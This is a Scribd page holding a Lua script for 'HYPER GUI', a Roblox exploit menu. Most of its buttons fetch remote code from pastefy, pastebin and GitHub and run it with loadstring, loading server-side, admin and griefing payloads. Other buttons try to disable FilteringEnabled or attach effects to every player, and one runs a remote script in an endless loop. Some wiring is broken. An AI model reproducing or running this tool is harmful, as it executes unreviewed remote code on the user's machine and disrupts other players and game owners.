0% found this document useful (0 votes)
8 views

HYPERGUI

The document is a Lua script for creating a GUI in Roblox, featuring a draggable frame with multiple buttons that execute various functions when clicked. Each button is associated with a specific action, such as loading scripts from URLs or modifying game properties. The GUI is designed for user interaction, allowing players to access different functionalities easily.
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
8 views

HYPERGUI

The document is a Lua script for creating a GUI in Roblox, featuring a draggable frame with multiple buttons that execute various functions when clicked. Each button is associated with a specific action, such as loading scripts from URLs or modifying game properties. The GUI is designed for user interaction, allowing players to access different functionalities easily.
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 8

-- Gui to Lua

-- Version: 3.2

-- Instances:

local ScreenGui = Instance.new("ScreenGui")


local Frame = Instance.new("Frame")
local TextLabel = Instance.new("TextLabel")
local TextLabel_2 = Instance.new("TextLabel")
local decalspam = Instance.new("TextButton")
local decalspam_2 = Instance.new("TextButton")
local TextLabel_3 = Instance.new("TextLabel")
local DESTROYYYYYYY = Instance.new("TextButton")
local decalspam_3 = Instance.new("TextButton")
local decalspam_4 = Instance.new("TextButton")
local decalspam_5 = Instance.new("TextButton")
local decalspam_6 = Instance.new("TextButton")
local decalspam_7 = Instance.new("TextButton")
local decalspam_8 = Instance.new("TextButton")
local decalspam_9 = Instance.new("TextButton")
local decalspam_10 = Instance.new("TextButton")
local decalspam_11 = Instance.new("TextButton")
local decalspam_12 = Instance.new("TextButton")
local decalspam_13 = Instance.new("TextButton")
local decalspam_14 = Instance.new("TextButton")
local decalspam_15 = Instance.new("TextButton")
local decalspam_16 = Instance.new("TextButton")
local decalspam_17 = Instance.new("TextButton")

--Properties:

ScreenGui.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui")
ScreenGui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling

Frame.Parent = ScreenGui
Frame.BackgroundColor3 = Color3.fromRGB(24, 24, 24)
Frame.BorderColor3 = Color3.fromRGB(8, 22, 240)
Frame.BorderSizePixel = 5
Frame.Position = UDim2.new(0.0546606332, 160, 0.336497754, -209)
Frame.Size = UDim2.new(0, 415, 0, 782)
Frame.Active = true
Frame.Draggable = true

TextLabel.Parent = Frame
TextLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel.BackgroundTransparency = 1.000
TextLabel.BorderColor3 = Color3.fromRGB(27, 42, 53)
TextLabel.Position = UDim2.new(0.272000015, 0, 0.0189999994, 0)
TextLabel.Size = UDim2.new(0, 170, 0, 32)
TextLabel.Font = Enum.Font.Arial
TextLabel.Text = "HYPER GUI"
TextLabel.TextColor3 = Color3.fromRGB(255, 255, 255)
TextLabel.TextScaled = true
TextLabel.TextSize = 14.000
TextLabel.TextWrapped = true

TextLabel_2.Parent = TextLabel
TextLabel_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_2.BackgroundTransparency = 1.000
TextLabel_2.BorderColor3 = Color3.fromRGB(27, 42, 53)
TextLabel_2.Position = UDim2.new(-0.00465017557, 0, 0.977094233, 0)
TextLabel_2.Size = UDim2.new(0, 170, 0, 32)
TextLabel_2.Font = Enum.Font.Arial
TextLabel_2.Text = "TOP"
TextLabel_2.TextColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_2.TextScaled = true
TextLabel_2.TextSize = 14.000
TextLabel_2.TextWrapped = true

decalspam.Name = "decal spam"


decalspam.Parent = TextLabel_2
decalspam.BackgroundColor3 = Color3.fromRGB(2, 2, 2)
decalspam.BorderColor3 = Color3.fromRGB(0, 0, 0)
decalspam.BorderSizePixel = 0
decalspam.Position = UDim2.new(-0.543097973, 0, 2.54024172, 0)
decalspam.Size = UDim2.new(0, 129, 0, 50)
decalspam.Font = Enum.Font.Arial
decalspam.Text = "Team 007n7"
decalspam.TextColor3 = Color3.fromRGB(255, 255, 255)
decalspam.TextSize = 23.000
decalspam.MouseButton1Down:connect(function()
loadstring(game:HttpGet("https://pastefy.app/0jpoKbST/raw"))()
end)

decalspam_2.Name = "decal spam"


decalspam_2.Parent = TextLabel_2
decalspam_2.BackgroundColor3 = Color3.fromRGB(2, 2, 2)
decalspam_2.BorderColor3 = Color3.fromRGB(232, 55, 37)
decalspam_2.BorderSizePixel = 3
decalspam_2.Position = UDim2.new(0.333372593, 0, 13.7902412, 0)
decalspam_2.Size = UDim2.new(0, 86, 0, 50)
decalspam_2.Font = Enum.Font.Arial
decalspam_2.Text = "Einstein"
decalspam_2.TextColor3 = Color3.fromRGB(255, 255, 255)
decalspam_2.TextSize = 23.000
decalspam_2.MouseButton1Down:connect(function()
local playerLeaderstats = {}
for i, v in pairs(game.Players:GetChildren()) do
table.insert(playerLeaderstats, v)
end
for i, v in pairs(playerLeaderstats) do
pe = Instance.new("ParticleEmitter",v.Character.Torso)
pe.Texture = "http://www.roblox.com/asset/?id=70749996348307"
pe.VelocitySpread = 50
end
end)

TextLabel_3.Parent = decalspam_2
TextLabel_3.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_3.BackgroundTransparency = 1.000
TextLabel_3.BorderColor3 = Color3.fromRGB(0, 0, 0)
TextLabel_3.BorderSizePixel = 0
TextLabel_3.Position = UDim2.new(-0.825788617, 0, 1.1906451, 0)
TextLabel_3.Size = UDim2.new(0, 200, 0, 23)
TextLabel_3.Font = Enum.Font.SourceSans
TextLabel_3.Text = "🤑🤑🤑"
TextLabel_3.TextColor3 = Color3.fromRGB(245, 230, 230)
TextLabel_3.TextScaled = true
TextLabel_3.TextSize = 14.000
TextLabel_3.TextWrapped = true

DESTROYYYYYYY.Name = "DESTROYYYYYYY"
DESTROYYYYYYY.Parent = TextLabel_2
DESTROYYYYYYY.BackgroundColor3 = Color3.fromRGB(2, 2, 2)
DESTROYYYYYYY.BorderColor3 = Color3.fromRGB(11, 22, 230)
DESTROYYYYYYY.BorderSizePixel = 0
DESTROYYYYYYY.Position = UDim2.new(-0.543097973, 0, 11.5089912, 0)
DESTROYYYYYYY.Size = UDim2.new(0, 377, 0, 50)
DESTROYYYYYYY.Font = Enum.Font.Arial
DESTROYYYYYYY.Text = "TOPK3K SS"
DESTROYYYYYYY.TextColor3 = Color3.fromRGB(255, 255, 255)
DESTROYYYYYYY.TextSize = 23.000
DESTROYYYYYYY.MouseButton1Down:connect(function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/c-1-23/c-1-23/refs/
heads/main/T0PK3K%205.0%20SS%20Edition"))()
end)

decalspam_3.Name = "decal spam"


decalspam_3.Parent = TextLabel_2
decalspam_3.BackgroundColor3 = Color3.fromRGB(2, 2, 2)
decalspam_3.BorderColor3 = Color3.fromRGB(0, 0, 0)
decalspam_3.BorderSizePixel = 0
decalspam_3.Position = UDim2.new(0.256902009, 0, 2.54024172, 0)
decalspam_3.Size = UDim2.new(0, 46, 0, 50)
decalspam_3.Font = Enum.Font.Arial
decalspam_3.Text = "Sheldoni"
decalspam_3.TextColor3 = Color3.fromRGB(255, 255, 255)
decalspam_3.TextScaled = true
decalspam_3.TextSize = 23.000
decalspam_3.TextWrapped = true
decalspam_3.MouseButton1Down:connect(function()
loadstring(game:HttpGet("https://pastefy.app/O1aH2RzD/raw"))()
end)

decalspam_4.Name = "decal spam"


decalspam_4.Parent = TextLabel_2
decalspam_4.BackgroundColor3 = Color3.fromRGB(2, 2, 2)
decalspam_4.BorderColor3 = Color3.fromRGB(11, 22, 230)
decalspam_4.BorderSizePixel = 0
decalspam_4.Position = UDim2.new(0.292196125, 0, 9.22774124, 0)
decalspam_4.Size = UDim2.new(0, 93, 0, 50)
decalspam_4.Font = Enum.Font.Arial
decalspam_4.Text = "LV GUI"
decalspam_4.TextColor3 = Color3.fromRGB(255, 255, 255)
decalspam_4.TextSize = 23.000
decalspam_4.MouseButton1Down:connect(function()
loadstring(game:GetObjects("rbxassetid://381089101")[1].Source)()
end)

decalspam_5.Name = "decal spam"


decalspam_5.Parent = TextLabel_2
decalspam_5.BackgroundColor3 = Color3.fromRGB(2, 2, 2)
decalspam_5.BorderColor3 = Color3.fromRGB(0, 0, 0)
decalspam_5.BorderSizePixel = 0
decalspam_5.Position = UDim2.new(1.19219613, 0, -0.866008282, 0)
decalspam_5.Size = UDim2.new(0, 99, 0, 50)
decalspam_5.Font = Enum.Font.Arial
decalspam_5.Text = "R6"
decalspam_5.TextColor3 = Color3.fromRGB(255, 255, 255)
decalspam_5.TextSize = 23.000
decalspam_5.MouseButton1Down:connect(function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/hi822010/R6/refs/heads/
main/jHGVauVX.txt"))()
end)

decalspam_6.Name = "decal spam"


decalspam_6.Parent = TextLabel_2
decalspam_6.BackgroundColor3 = Color3.fromRGB(2, 2, 2)
decalspam_6.BorderColor3 = Color3.fromRGB(11, 22, 230)
decalspam_6.BorderSizePixel = 0
decalspam_6.Position = UDim2.new(-0.543097973, 0, 9.22774124, 0)
decalspam_6.Size = UDim2.new(0, 129, 0, 50)
decalspam_6.Font = Enum.Font.Arial
decalspam_6.Text = "FE Disabled"
decalspam_6.TextColor3 = Color3.fromRGB(255, 255, 255)
decalspam_6.TextSize = 23.000
decalspam_6.MouseButton1Down:connect(function()
game.Workspace.FilteringEnabled = false
end)

decalspam_7.Name = "decal spam"


decalspam_7.Parent = TextLabel_2
decalspam_7.BackgroundColor3 = Color3.fromRGB(2, 2, 2)
decalspam_7.BorderColor3 = Color3.fromRGB(0, 0, 0)
decalspam_7.BorderSizePixel = 0
decalspam_7.Position = UDim2.new(0.586313784, 0, 2.54024172, 0)
decalspam_7.Size = UDim2.new(0, 43, 0, 50)
decalspam_7.Font = Enum.Font.Arial
decalspam_7.Text = "FE Disabled 2"
decalspam_7.TextColor3 = Color3.fromRGB(255, 255, 255)
decalspam_7.TextScaled = true
decalspam_7.TextSize = 23.000
decalspam_7.TextWrapped = true
decalspam_7.MouseButton1Down:connect(function()
game.NetworkClient.ClientReplication:FireServer("Ugc.Workspace.FilteringEnabled =
false;")
end)

decalspam_8.Name = "decal spam"


decalspam_8.Parent = TextLabel_2
decalspam_8.BackgroundColor3 = Color3.fromRGB(2, 2, 2)
decalspam_8.BorderColor3 = Color3.fromRGB(11, 22, 230)
decalspam_8.BorderSizePixel = 0
decalspam_8.Position = UDim2.new(0.915725529, 0, 7.13399172, 0)
decalspam_8.Size = UDim2.new(0, 129, 0, 50)
decalspam_8.Font = Enum.Font.Arial
decalspam_8.Text = "MrBean Admin"
decalspam_8.TextColor3 = Color3.fromRGB(255, 255, 255)
decalspam_8.TextSize = 23.000
decalspam_8.MouseButton1Down:connect(function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/Test4267/mrbean/refs/
heads/main/hh"))()
end)

decalspam_9.Name = "decal spam"


decalspam_9.Parent = TextLabel_2
decalspam_9.BackgroundColor3 = Color3.fromRGB(2, 2, 2)
decalspam_9.BorderColor3 = Color3.fromRGB(0, 0, 0)
decalspam_9.BorderSizePixel = 0
decalspam_9.Position = UDim2.new(0.915725529, 0, 2.54024172, 0)
decalspam_9.Size = UDim2.new(0, 129, 0, 50)
decalspam_9.Font = Enum.Font.Arial
decalspam_9.Text = "Exser New"
decalspam_9.TextColor3 = Color3.fromRGB(255, 255, 255)
decalspam_9.TextSize = 23.000
decalspam.MouseButton1Down:connect(function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/gitluau/luauexser/refs/
heads/main/pHzp8uG1PO962o6qucrlP3AJy17eV3B.lua"))()
end)

decalspam_10.Name = "decal spam"


decalspam_10.Parent = TextLabel_2
decalspam_10.BackgroundColor3 = Color3.fromRGB(2, 2, 2)
decalspam_10.BorderColor3 = Color3.fromRGB(0, 0, 0)
decalspam_10.BorderSizePixel = 0
decalspam_10.Position = UDim2.new(-0.543097973, 0, 4.79024172, 0)
decalspam_10.Size = UDim2.new(0, 129, 0, 50)
decalspam_10.Font = Enum.Font.Arial
decalspam_10.Text = "Mario.exe"
decalspam_10.TextColor3 = Color3.fromRGB(255, 255, 255)
decalspam_10.TextSize = 23.000
decalspam_10.MouseButton1Down:connect(function()
loadstring(game:HttpGet("https://pastefy.app/vlQk0Kqy/raw"))()
end)

decalspam_11.Name = "decal spam"


decalspam_11.Parent = TextLabel_2
decalspam_11.BackgroundColor3 = Color3.fromRGB(2, 2, 2)
decalspam_11.BorderColor3 = Color3.fromRGB(11, 22, 230)
decalspam_11.BorderSizePixel = 0
decalspam_11.Position = UDim2.new(0.915725529, 0, 9.22774124, 0)
decalspam_11.Size = UDim2.new(0, 129, 0, 50)
decalspam_11.Font = Enum.Font.Arial
decalspam_11.Text = "Skeleton"
decalspam_11.TextColor3 = Color3.fromRGB(255, 255, 255)
decalspam_11.TextSize = 23.000
decalspam_11.MouseButton1Down:connect(function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/ryand56/Scripts/refs/
heads/Scripts/skeleton%20skybox.txt"))()
end)

decalspam_12.Name = "decal spam"


decalspam_12.Parent = TextLabel_2
decalspam_12.BackgroundColor3 = Color3.fromRGB(2, 2, 2)
decalspam_12.BorderColor3 = Color3.fromRGB(11, 22, 230)
decalspam_12.BorderSizePixel = 0
decalspam_12.Position = UDim2.new(0.274549067, 0, 4.79024172, 0)
decalspam_12.Size = UDim2.new(0, 96, 0, 50)
decalspam_12.Font = Enum.Font.Arial
decalspam_12.Text = "My Horror"
decalspam_12.TextColor3 = Color3.fromRGB(255, 255, 255)
decalspam_12.TextSize = 23.000
decalspam_12.MouseButton1Down:connect(function()
loadstring(game:HttpGet("https://pastefy.app/ztGspSzF/raw"))()
end)
decalspam_13.Name = "decal spam"
decalspam_13.Parent = TextLabel_2
decalspam_13.BackgroundColor3 = Color3.fromRGB(2, 2, 2)
decalspam_13.BorderColor3 = Color3.fromRGB(11, 22, 230)
decalspam_13.BorderSizePixel = 0
decalspam_13.Position = UDim2.new(0.915725529, 0, 13.7902412, 0)
decalspam_13.Size = UDim2.new(0, 129, 0, 50)
decalspam_13.Font = Enum.Font.Arial
decalspam_13.Text = "Herbert"
decalspam_13.TextColor3 = Color3.fromRGB(255, 255, 255)
decalspam_13.TextSize = 23.000
decalspam_13.MouseButton1Down:connect(function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/hi822010/OH-MY-GOD/
refs/heads/main/herbertloadstring2.lua"))()
end)

decalspam_14.Name = "decal spam"


decalspam_14.Parent = TextLabel_2
decalspam_14.BackgroundColor3 = Color3.fromRGB(2, 2, 2)
decalspam_14.BorderColor3 = Color3.fromRGB(11, 22, 230)
decalspam_14.BorderSizePixel = 0
decalspam_14.Position = UDim2.new(0.915725529, 0, 4.79024172, 0)
decalspam_14.Size = UDim2.new(0, 129, 0, 50)
decalspam_14.Font = Enum.Font.Arial
decalspam_14.Text = "666"
decalspam_14.TextColor3 = Color3.fromRGB(255, 255, 255)
decalspam_14.TextSize = 23.000
decalspam_14.MouseButton1Down:connect(function()
loadstring(game:HttpGet("https://pastefy.app/NPvlV9Xk/raw"))()
end)

decalspam_15.Name = "decal spam"


decalspam_15.Parent = TextLabel_2
decalspam_15.BackgroundColor3 = Color3.fromRGB(2, 2, 2)
decalspam_15.BorderColor3 = Color3.fromRGB(11, 22, 230)
decalspam_15.BorderSizePixel = 0
decalspam_15.Position = UDim2.new(0.274549067, 0, 7.13399172, 0)
decalspam_15.Size = UDim2.new(0, 96, 0, 50)
decalspam_15.Font = Enum.Font.Arial
decalspam_15.Text = "444 Japan"
decalspam_15.TextColor3 = Color3.fromRGB(255, 255, 255)
decalspam_15.TextSize = 23.000
decalspam_15.MouseButton1Down:connect(function()
loadstring(game:HttpGet("https://pastebin.com/raw/Spc8gGLs"))()
end)

decalspam_16.Name = "decal spam"


decalspam_16.Parent = TextLabel_2
decalspam_16.BackgroundColor3 = Color3.fromRGB(2, 2, 2)
decalspam_16.BorderColor3 = Color3.fromRGB(11, 22, 230)
decalspam_16.BorderSizePixel = 0
decalspam_16.Position = UDim2.new(-0.543097973, 0, 7.13399172, 0)
decalspam_16.Size = UDim2.new(0, 129, 0, 50)
decalspam_16.Font = Enum.Font.Arial
decalspam_16.Text = "Obama"
decalspam_16.TextColor3 = Color3.fromRGB(255, 255, 255)
decalspam_16.TextSize = 23.000
decalspam_16.MouseButton1Down:connect(function()
local Players = game:GetService("Players")

while task.wait() do
for _, player in ipairs(Players:GetPlayers()) do
loadstring(game:HttpGet("https://pastefy.app/xW6jHXFx/raw"))()
end
end
end)

decalspam_17.Name = "decal spam"


decalspam_17.Parent = TextLabel_2
decalspam_17.BackgroundColor3 = Color3.fromRGB(2, 2, 2)
decalspam_17.BorderColor3 = Color3.fromRGB(253, 250, 249)
decalspam_17.BorderSizePixel = 2
decalspam_17.Position = UDim2.new(-0.543097973, 0, 13.7902412, 0)
decalspam_17.Size = UDim2.new(0, 129, 0, 50)
decalspam_17.Font = Enum.Font.Arial
decalspam_17.Text = "Tubers93"
decalspam_17.TextColor3 = Color3.fromRGB(255, 255, 255)
decalspam_17.TextSize = 23.000
decalspam_17.MouseButton1Down:connect(function()
loadstring(game:HttpGet("https://pastefy.app/WTFwlHdC/raw"))()
end)

--Scripts

function dragify(Main)
dragToggle = nil
dragSpeed = 0.95 -- You can edit this.
dragInput = nil
dragStart = nil
dragPos = nil

function updateInput(input)
Delta = input.Position - dragStart
Position = UDim2.new(startPos.X.Scale, startPos.X.Offset + Delta.X,
startPos.Y.Scale, startPos.Y.Offset + Delta.Y)
game:GetService("TweenService"):Create(Main, TweenInfo.new(.25), {Position =
Position}):Play()
end

Main.InputBegan:Connect(function(input)
if (input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType
== Enum.UserInputType.Touch) then
dragToggle = true
dragStart = input.Position
startPos = Main.Position
input.Changed:Connect(function()
if (input.UserInputState == Enum.UserInputState.End) then
dragToggle = false
end
end)
end
end)

Main.InputChanged:Connect(function(input)
if (input.UserInputType == Enum.UserInputType.MouseMovement or input.UserInputType
== Enum.UserInputType.Touch) then
dragInput = input
end
end)

game:GetService("UserInputService").InputChanged:Connect(function(input)
if (input == dragInput and dragToggle) then
updateInput(input)
end
end)
end

dragify(script.Parent)

You might also like